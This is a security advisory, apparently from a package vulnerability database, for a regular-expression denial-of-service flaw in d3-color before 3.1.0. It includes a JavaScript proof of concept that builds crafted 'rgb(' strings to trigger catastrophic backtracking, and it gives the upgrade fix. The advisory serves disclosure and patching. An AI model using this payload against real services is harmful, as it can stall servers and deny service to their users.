Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) d3-color is a Color spaces! RGB, HSL, Cubehelix, Lab and HCL (Lch). Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `rgb()` and `hrc()` functions. PoC by Yeting Li: `var d3Color = require("d3-color") // d3Color.rgb("rgb(255,255,255)") function build_blank(n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += "1" } return ret + "!"; } for(var i = 1; i <= 5000000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_blank(i) d3Color.rgb(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms") } }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `d3-color` to version 3.1.0 or higher.	<3.1.0

Regular Expression Denial of Service (ReDoS)

d3-color is a Color spaces! RGB, HSL, Cubehelix, Lab and HCL (Lch).

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the rgb() and hrc() functions.

PoC by Yeting Li:

var d3Color = require("d3-color")
// d3Color.rgb("rgb(255,255,255)")

function build_blank(n) {
    var ret = "rgb("
    for (var i = 0; i < n; i++) {
        ret += "1"
    }
    return ret + "!";
}

for(var i = 1; i <= 5000000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_blank(i)
        d3Color.rgb(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade d3-color to version 3.1.0 or higher.

<3.1.0

Go back to all versions of this package